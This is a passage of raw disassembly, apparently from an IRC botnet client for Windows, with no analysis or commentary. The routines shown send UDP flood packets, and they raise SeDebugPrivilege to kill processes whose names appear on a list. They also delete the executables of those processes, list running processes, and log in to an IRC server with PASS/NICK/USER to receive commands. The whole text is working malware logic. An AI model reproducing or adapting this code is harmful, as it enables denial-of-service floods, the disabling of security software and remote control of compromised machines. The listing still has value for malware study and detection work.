push [ebp+var_28]
loc_406F7E: ; CODE XREF: sub_406E62+117�j
call dword_4335EC ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_34]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_2C], edi
mov [ebp+var_34], eax
jnz short loc_406F9C
mov [ebp+var_2C], esi
loc_406F9C: ; CODE XREF: sub_406E62+135�j
xor esi, esi
cmp [ebp+var_30], edi
jle short loc_407017
loc_406FA3: ; CODE XREF: sub_406E62+159�j
call sub_412D71
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_30]
mov [ebp+esi-10315h], dl
jl short loc_406FA3
jmp short loc_407017
; ---------------------------------------------------------------------------
loc_406FBF: ; CODE XREF: sub_406E62+1B8�j
dec [ebp+var_34]
push 0Bh
pop esi
loc_406FC5: ; CODE XREF: sub_406E62+195�j
push 10h
lea eax, [ebp+var_14]
push eax
push edi
call sub_412D71
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_30]
sub eax, edx
push eax
lea eax, [ebp+var_10314]
push eax
push [ebp+var_4]
call dword_433470 ; sendto
push [ebp+var_2C]
call ds:dword_41F000 ; Sleep
dec esi
jnz short loc_406FC5
cmp [ebp+var_28], edi
jnz short loc_407017
call sub_412D71
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4335EC ; ntohs
mov [ebp+var_12], ax
loc_407017: ; CODE XREF: sub_406E62+13F�j
; sub_406E62+15B�j ...
cmp [ebp+var_34], edi
jg short loc_406FBF
dec [ebp+var_34]
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_40705F
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4045DD
add esp, 14h
loc_40705F: ; CODE XREF: sub_406E62+1DB�j
lea eax, [ebp+var_338]
push eax
call sub_401C33
push [ebp+var_24]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_407076: ; CODE XREF: sub_406E62+D6�j
call ds:dword_41F014 ; ExitThread
loc_40707C: ; DATA XREF: .data:0042BBE4�o
; .data:0042BBF8�o ...
int 3 ; Trap to Debugger
sub_406E62 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40707D proc near ; CODE XREF: sub_4058F3+7�p
; sub_4070E8+5F�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_41F0B4 ; GetCurrentProcess
push eax
call dword_4335D4 ; OpenProcessToken
test eax, eax
jnz short loc_40709C
leave
retn
; ---------------------------------------------------------------------------
loc_40709C: ; CODE XREF: sub_40707D+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_4335BC ; LookupPrivilegeValueA
test eax, eax
jz short loc_4070DA
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_4070C3
or [ebp+var_8], 2
jmp short loc_4070C7
; ---------------------------------------------------------------------------
loc_4070C3: ; CODE XREF: sub_40707D+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_4070C7: ; CODE XREF: sub_40707D+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_433508 ; AdjustTokenPrivileges
mov esi, eax
loc_4070DA: ; CODE XREF: sub_40707D+32�j
push [ebp+var_4]
call ds:dword_41F034 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_40707D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4070E8 proc near ; CODE XREF: sub_4073FB+68�p
; sub_4074FD+C�p ...
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_433490, ebx
pop ecx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_4072F9
cmp dword_4334EC, ebx
jz loc_4072F9
cmp dword_433450, ebx
jz loc_4072F9
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40707D
pop ecx
pop ecx
push ebx
push 0Fh
call dword_433490 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_4072EC
lea eax, [ebp+var_12C]
push eax
push edi
mov [ebp+var_12C], 128h
call dword_4334EC ; Process32First
test eax, eax
mov esi, ds:dword_41F034
jz loc_4072E7
lea eax, [ebp+var_12C]
push eax
push edi
call dword_433450 ; Process32Next
test eax, eax
jz loc_4072E7
mov ebx, ds:dword_41F0C4
loc_4071A7: ; CODE XREF: sub_4070E8+1F7�j
cmp [ebp+arg_10], 0
jz short loc_407208
xor edi, edi
loc_4071AF: ; CODE XREF: sub_4070E8+E7�j
push off_42A458[edi]
lea eax, [ebp+var_108]
push eax
call ds:dword_41F0C0 ; lstrcmpiA
test eax, eax
jz short loc_4071D6
add edi, 4
cmp edi, 9E0h
jb short loc_4071AF
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_4071D6: ; CODE XREF: sub_4070E8+DC�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_4072CD
push 0
push edi
call ds:dword_41F0BC ; TerminateProcess
test eax, eax
jnz loc_4072CD
loc_407200: ; CODE XREF: sub_4070E8+1AF�j
push edi
call esi ; CloseHandle
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_407208: ; CODE XREF: sub_4070E8+C3�j
mov edi, [ebp+arg_C]
test edi, edi
jnz loc_40729C
cmp [ebp+arg_4], edi
jz loc_4072CD
push [ebp+var_124]
push 8
call dword_433490 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_40725C
lea eax, [ebp+var_350]
push eax
push edi
call dword_4334B8 ; Module32First
test eax, eax
push [ebp+var_124]
jz short loc_407262
lea eax, [ebp+var_230]
jmp short loc_407268
; ---------------------------------------------------------------------------
loc_40725C: ; CODE XREF: sub_4070E8+152�j
push [ebp+var_124]
loc_407262: ; CODE XREF: sub_4070E8+16A�j
lea eax, [ebp+var_108]
loc_407268: ; CODE XREF: sub_4070E8+172�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_412BB5
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
jmp loc_407200
; ---------------------------------------------------------------------------
loc_40729C: ; CODE XREF: sub_4070E8+125�j
lea eax, [ebp+var_108]
loc_4072A2: ; CODE XREF: sub_4070E8+1D6�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_4072C4
test cl, cl
jz short loc_4072C0
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_4072C4
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_4072A2
loc_4072C0: ; CODE XREF: sub_4070E8+1C4�j
xor eax, eax
jmp short loc_4072C9
; ---------------------------------------------------------------------------
loc_4072C4: ; CODE XREF: sub_4070E8+1C0�j
; sub_4070E8+1CE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4072C9: ; CODE XREF: sub_4070E8+1DA�j
test eax, eax
jz short loc_407300
loc_4072CD: ; CODE XREF: sub_4070E8+E9�j
; sub_4070E8+101�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_433450 ; Process32Next
test eax, eax
jnz loc_4071A7
xor ebx, ebx
loc_4072E7: ; CODE XREF: sub_4070E8+9D�j
; sub_4070E8+B3�j
push [ebp+var_4]
call esi ; CloseHandle
loc_4072EC: ; CODE XREF: sub_4070E8+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40707D
pop ecx
pop ecx
loc_4072F9: ; CODE XREF: sub_4070E8+3A�j
; sub_4070E8+46�j ...
xor eax, eax
loc_4072FB: ; CODE XREF: sub_4070E8+30E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407300: ; CODE XREF: sub_4070E8+1E3�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+var_124]
mov edi, eax
push 8
call dword_433490 ; CreateToolhelp32Snapshot
push [ebp+var_4]
mov ebx, eax
mov [ebp+var_350], 224h
call esi ; CloseHandle
push 0
push edi
call ds:dword_41F0BC ; TerminateProcess
test eax, eax
jnz short loc_407345
push edi
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
jmp short loc_4072F9
; ---------------------------------------------------------------------------
loc_407345: ; CODE XREF: sub_4070E8+253�j
cmp [ebp+arg_18], 0
jz loc_4073F3
lea eax, [ebp+var_350]
push eax
push ebx
call dword_4334B8 ; Module32First
test eax, eax
jz short loc_4073B8
push ebx
call esi ; CloseHandle
xor esi, esi
loc_407366: ; CODE XREF: sub_4070E8+2B2�j
push 7D0h
call ds:dword_41F000 ; Sleep
push 20h
lea eax, [ebp+var_230]
push eax
inc esi
call ds:dword_41F0A0 ; SetFileAttributesA
lea eax, [ebp+var_230]
push eax
call ds:dword_41F0B8 ; DeleteFileA
test eax, eax
setnz al
test al, al
jnz short loc_4073AA
cmp esi, 5
jl short loc_407366
lea eax, [ebp+var_230]
push eax
push offset aCouldNotDelete ; "Could not delete '%s'.!\n"
jmp short loc_4073C4
; ---------------------------------------------------------------------------
loc_4073AA: ; CODE XREF: sub_4070E8+2AD�j
lea eax, [ebp+var_230]
push eax
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'.\n"
jmp short loc_4073C4
; ---------------------------------------------------------------------------
loc_4073B8: ; CODE XREF: sub_4070E8+277�j
lea eax, [ebp+var_108]
push eax
push offset aCannotExtractP ; "Cannot extract process path for %s\n"
loc_4073C4: ; CODE XREF: sub_4070E8+2C0�j
; sub_4070E8+2CE�j
lea eax, [ebp+var_550]
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_4073F3
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_4073F3: ; CODE XREF: sub_4070E8+261�j
; sub_4070E8+2EF�j
xor eax, eax
inc eax
jmp loc_4072FB
sub_4070E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4073FB proc near ; DATA XREF: sub_4078FA+43C7�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_298]
push offset aProcListingPro ; "[PROC]: Listing processes:"
push eax
call sub_412BB5
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_407453
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4045DD
add esp, 14h
loc_407453: ; CODE XREF: sub_4073FB+3C�j
push esi
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_4070E8
add esp, 1Ch
test eax, eax
lea eax, [ebp+74h+var_298]
jnz short loc_40747C
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_407481
; ---------------------------------------------------------------------------
loc_40747C: ; CODE XREF: sub_4073FB+78�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_407481: ; CODE XREF: sub_4073FB+7F�j
push eax
call sub_412BB5
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4074A8
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4045DD
add esp, 14h
loc_4074A8: ; CODE XREF: sub_4073FB+91�j
lea eax, [ebp+74h+var_298]
push eax
call sub_401C33
push [ebp+74h+var_14]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4073FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4074C6 proc near ; CODE XREF: sub_4078FA+35CA�p
; sub_410FD3+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call ds:dword_41F0C4 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_4074F8
push 0
push esi
call ds:dword_41F0BC ; TerminateProcess
test eax, eax
jnz short loc_4074F8
push esi
xor edi, edi
call ds:dword_41F034 ; CloseHandle
loc_4074F8: ; CODE XREF: sub_4074C6+1A�j
; sub_4074C6+27�j
mov eax, edi
pop edi
pop esi
retn
sub_4074C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4074FD proc near ; DATA XREF: sub_4078FA+1EC7�o
push esi
xor esi, esi
loc_407500: ; CODE XREF: sub_4074FD+20�j
push esi
push 1
push 1
push esi
push esi
push esi
push esi
call sub_4070E8
add esp, 1Ch
push dword_42A450
call ds:dword_41F000 ; Sleep
jmp short loc_407500
sub_4074FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_40751F proc near ; CODE XREF: sub_40779B+D0�p
var_1E1C = byte ptr -1E1Ch
var_E1C = byte ptr -0E1Ch
var_64C = byte ptr -64Ch
var_5AC = byte ptr -5ACh
var_4AC = byte ptr -4ACh
var_2AC = byte ptr -2ACh
var_AC = byte ptr -0ACh
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1E1Ch
lea ebp, [esp-58h]
call sub_412DD0
push ebx
push esi
xor ebx, ebx
push 2
mov [ebp+58h+var_14], ebx
lea eax, [ebp+58h+var_5AC]
pop ecx
loc_40753E: ; CODE XREF: sub_40751F+28�j
and byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_40753E
cmp byte_479BB4, 0
jz short loc_407567
push offset byte_479BB4
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_404592
add esp, 0Ch
loc_407567: ; CODE XREF: sub_40751F+31�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_2C]
push ebx
push ebx
push 2
push eax
call sub_40E7B0
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_AC]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_412BB5
lea eax, [ebp+58h+var_AC]
add esp, 14h
lea esi, [eax+1]
loc_407595: ; CODE XREF: sub_40751F+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407595
push ebx
sub eax, esi
push eax
lea eax, [ebp+58h+var_AC]
push eax
push [ebp+58h+arg_0]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4075CD
push [ebp+58h+arg_0]
call dword_4335AC ; closesocket
push 7D0h
call ds:dword_41F000 ; Sleep
xor eax, eax
jmp loc_407794
; ---------------------------------------------------------------------------
loc_4075CD: ; CODE XREF: sub_40751F+91�j
push edi
jmp loc_40775A
; ---------------------------------------------------------------------------
loc_4075D3: ; CODE XREF: sub_40751F+262�j
lea eax, [ebp+58h+var_E1C]
push eax
lea eax, [ebp+58h+var_1E1C]
push eax
call sub_40564B
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_18], eax
mov [ebp+58h+var_10], ebx
jle loc_40775A
lea esi, [ebp+58h+var_E1C]
mov [ebp+58h+var_C], esi
loc_4075FF: ; CODE XREF: sub_40751F+235�j
push offset asc_4246B4 ; " :"
push dword ptr [esi]
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_2AC]
rep stosd
call sub_413920
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_4], eax
jz short loc_407629
add [ebp+58h+var_4], 2
jmp short loc_40762E
; ---------------------------------------------------------------------------
loc_407629: ; CODE XREF: sub_40751F+102�j
mov eax, [esi]
mov [ebp+58h+var_4], eax
loc_40762E: ; CODE XREF: sub_40751F+108�j
push 1FFh
push [ebp+58h+var_4]
lea eax, [ebp+58h+var_2AC]
push eax
call sub_412C40
lea eax, [ebp+58h+var_2AC]
push offset asc_4246B0 ; "|"
push eax
call sub_413859
add esp, 14h
test eax, eax
mov [ebp+58h+var_8], eax
lea ebx, [ebp+58h+var_2AC]
jz loc_407743
loc_407667: ; CODE XREF: sub_40751F+21E�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_4AC]
rep stosd
mov eax, [esi]
mov ecx, [ebp+58h+var_4]
sub ecx, eax
push ecx
push eax
lea eax, [ebp+58h+var_4AC]
push eax
call sub_412C40
mov eax, [ebp+58h+var_8]
add esp, 0Ch
mov esi, eax
loc_407693: ; CODE XREF: sub_40751F+179�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407693
lea edi, [ebp+58h+var_4AC]
sub eax, esi
dec edi
loc_4076A3: ; CODE XREF: sub_40751F+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4076A3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+58h+var_8]
and ecx, 3
rep movsb
lea esi, [eax+1]
loc_4076BF: ; CODE XREF: sub_40751F+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4076BF
sub eax, esi
lea ebx, [ebx+eax+1]
push offset asc_4246B0 ; "|"
push ebx
call sub_413859
pop ecx
xor esi, esi
pop ecx
mov [ebp+58h+var_8], eax
inc esi
loc_4076DF: ; CODE XREF: sub_40751F+206�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_14]
push esi
push eax
lea eax, [ebp+58h+var_64C]
push eax
lea eax, [ebp+58h+var_5AC]
push eax
push [ebp+58h+arg_18]
lea eax, [ebp+58h+var_4AC]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push eax
call sub_4078FA
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_407727
push 0FAh
call ds:dword_41F000 ; Sleep
jmp short loc_4076DF
; ---------------------------------------------------------------------------
loc_407727: ; CODE XREF: sub_40751F+1F9�j
cmp esi, 0FFFFFFFDh
jz short loc_407790
cmp esi, 0FFFFFFFEh
jz short loc_40778B
cmp esi, 0FFFFFFFFh
jz short loc_407787
cmp [ebp+58h+var_8], 0
mov esi, [ebp+58h+var_C]
jnz loc_407667
loc_407743: ; CODE XREF: sub_40751F+142�j
inc [ebp+58h+var_10]
mov eax, [ebp+58h+var_10]
add esi, 4
xor ebx, ebx
cmp eax, [ebp+58h+var_18]
mov [ebp+58h+var_C], esi
jl loc_4075FF
loc_40775A: ; CODE XREF: sub_40751F+AF�j
; sub_40751F+D1�j
xor eax, eax
push ebx
lea edi, [ebp+58h+var_1E1C]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+58h+var_1E1C]
push eax
push [ebp+58h+arg_0]
call dword_433414 ; recv
test eax, eax
jg loc_4075D3
loc_407787: ; CODE XREF: sub_40751F+215�j
xor eax, eax
jmp short loc_407793
; ---------------------------------------------------------------------------
loc_40778B: ; CODE XREF: sub_40751F+210�j
xor eax, eax
inc eax
jmp short loc_407793
; ---------------------------------------------------------------------------
loc_407790: ; CODE XREF: sub_40751F+20B�j
push 2
pop eax
loc_407793: ; CODE XREF: sub_40751F+26A�j
; sub_40751F+26F�j
pop edi
loc_407794: ; CODE XREF: sub_40751F+A9�j
pop esi
pop ebx
add ebp, 58h
leave
retn
sub_40751F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40779B proc near ; CODE XREF: sub_40D1EF+472�p
; DATA XREF: sub_4078FA+296C�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
inc ebx
rep movsd
mov [eax+160h], ebx
jmp loc_407896
; ---------------------------------------------------------------------------
loc_4077C5: ; CODE XREF: sub_40779B+129�j
push 7
pop ecx
xor eax, eax
push eax
push dword_42AE68
lea edi, [ebp+var_2C]
push dword_42AE64
rep stosd
lea eax, [ebp+var_2C]
push eax
call sub_40E7B0
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_434350
push edi
push eax
call sub_412C40
add esp, 1Ch
push 6
push ebx
push 2
call dword_4334A0 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
mov dword_434344[eax], esi
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4078CC
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_401CA7
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
push [ebp+var_190]
lea eax, [ebp+var_CC]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40751F
add esp, 28h
push esi
mov edi, eax
call dword_4335AC ; closesocket
test edi, edi
jz short loc_407896
cmp edi, ebx
jnz short loc_407891
push 1D4C0h
call ds:dword_41F000 ; Sleep
jmp short loc_407896
; ---------------------------------------------------------------------------
loc_407891: ; CODE XREF: sub_40779B+E7�j
cmp edi, 2
jz short loc_4078E7
loc_407896: ; CODE XREF: sub_40779B+25�j
; sub_40779B+E3�j ...
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_4335EC ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_406B1D
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz loc_4077C5
jmp short loc_4078F3
; ---------------------------------------------------------------------------
loc_4078CC: ; CODE XREF: sub_40779B+92�j
push esi
call dword_4335AC ; closesocket
call sub_406B46
push 7D0h
call ds:dword_41F000 ; Sleep
mov eax, ebx
jmp short loc_4078F3
; ---------------------------------------------------------------------------
loc_4078E7: ; CODE XREF: sub_40779B+F9�j
push [ebp+var_34]
call sub_4111AE
pop ecx
push 2
pop eax
loc_4078F3: ; CODE XREF: sub_40779B+12F�j
; sub_40779B+14A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40779B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078FA proc near ; CODE XREF: sub_40751F+1EC�p
var_2178 = byte ptr -2178h
var_1D78 = byte ptr -1D78h
var_1BE8 = byte ptr -1BE8h
var_19E8 = byte ptr -19E8h
var_18E8 = byte ptr -18E8h
var_17E8 = byte ptr -17E8h
var_15E8 = byte ptr -15E8h
var_15E4 = byte ptr -15E4h
var_14E4 = dword ptr -14E4h
var_14E0 = byte ptr -14E0h
var_13E0 = byte ptr -13E0h
var_1360 = dword ptr -1360h
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = byte ptr -1344h
var_1340 = byte ptr -1340h
var_1240 = byte ptr -1240h
var_123C = byte ptr -123Ch
var_11BC = byte ptr -11BCh
var_117C = byte ptr -117Ch
var_10EC = dword ptr -10ECh
var_10E8 = dword ptr -10E8h
var_10E4 = dword ptr -10E4h
var_10E0 = dword ptr -10E0h
var_10DC = dword ptr -10DCh
var_10D4 = byte ptr -10D4h
var_1054 = byte ptr -1054h
var_FD4 = dword ptr -0FD4h
var_FD0 = dword ptr -0FD0h
var_FCC = dword ptr -0FCCh
var_FC4 = dword ptr -0FC4h
var_FC0 = dword ptr -0FC0h
var_FBC = dword ptr -0FBCh
var_FB4 = dword ptr -0FB4h
var_FB0 = byte ptr -0FB0h
var_FAC = dword ptr -0FACh
var_FA8 = byte ptr -0FA8h
var_F28 = byte ptr -0F28h
var_E28 = byte ptr -0E28h
var_D29 = byte ptr -0D29h
var_D28 = byte ptr -0D28h
var_C28 = dword ptr -0C28h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = dword ptr -0C14h
var_C10 = dword ptr -0C10h
var_C0C = dword ptr -0C0Ch
var_C08 = dword ptr -0C08h
var_C04 = byte ptr -0C04h
var_B84 = dword ptr -0B84h
var_B80 = byte ptr -0B80h
var_B74 = byte ptr -0B74h
var_B70 = byte ptr -0B70h
var_B00 = byte ptr -0B00h
var_A80 = dword ptr -0A80h
var_A7C = dword ptr -0A7Ch
var_A78 = dword ptr -0A78h
var_A74 = dword ptr -0A74h
var_A70 = byte ptr -0A70h
var_A64 = byte ptr -0A64h
var_A54 = dword ptr -0A54h
var_A50 = byte ptr -0A50h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9D0 = byte ptr -9D0h
var_998 = byte ptr -998h
var_990 = byte ptr -990h
var_918 = byte ptr -918h
var_898 = dword ptr -898h
var_894 = dword ptr -894h
var_890 = dword ptr -890h
var_88C = dword ptr -88Ch
var_888 = dword ptr -888h
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_874 = dword ptr -874h
var_870 = byte ptr -870h
var_7F0 = byte ptr -7F0h
var_770 = dword ptr -770h
var_76C = dword ptr -76Ch
var_768 = dword ptr -768h
var_764 = dword ptr -764h
var_760 = dword ptr -760h
var_75C = dword ptr -75Ch
var_758 = dword ptr -758h
var_754 = dword ptr -754h
var_750 = dword ptr -750h
var_74C = byte ptr -74Ch
var_67C = byte ptr -67Ch
var_66C = byte ptr -66Ch
var_648 = byte ptr -648h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_53C = dword ptr -53Ch
var_538 = byte ptr -538h
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C0 = dword ptr -4C0h
var_4BC = dword ptr -4BCh
var_4B8 = dword ptr -4B8h
var_4B4 = dword ptr -4B4h
var_4B0 = dword ptr -4B0h
var_4AC = byte ptr -4ACh
var_44B = byte ptr -44Bh
var_44A = byte ptr -44Ah
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = dword ptr -444h
var_440 = byte ptr -440h
var_43E = byte ptr -43Eh
var_43C = byte ptr -43Ch
var_43B = byte ptr -43Bh
var_43A = byte ptr -43Ah
var_439 = byte ptr -439h
var_432 = byte ptr -432h
var_410 = byte ptr -410h
var_3F0 = dword ptr -3F0h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = dword ptr -3B4h
var_3B0 = dword ptr -3B0h
var_3AC = byte ptr -3ACh
var_390 = dword ptr -390h
var_38C = byte ptr -38Ch
var_388 = dword ptr -388h
var_384 = byte ptr -384h
var_378 = dword ptr -378h
var_374 = byte ptr -374h
var_30C = byte ptr -30Ch
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_C8 = word ptr -0C8h
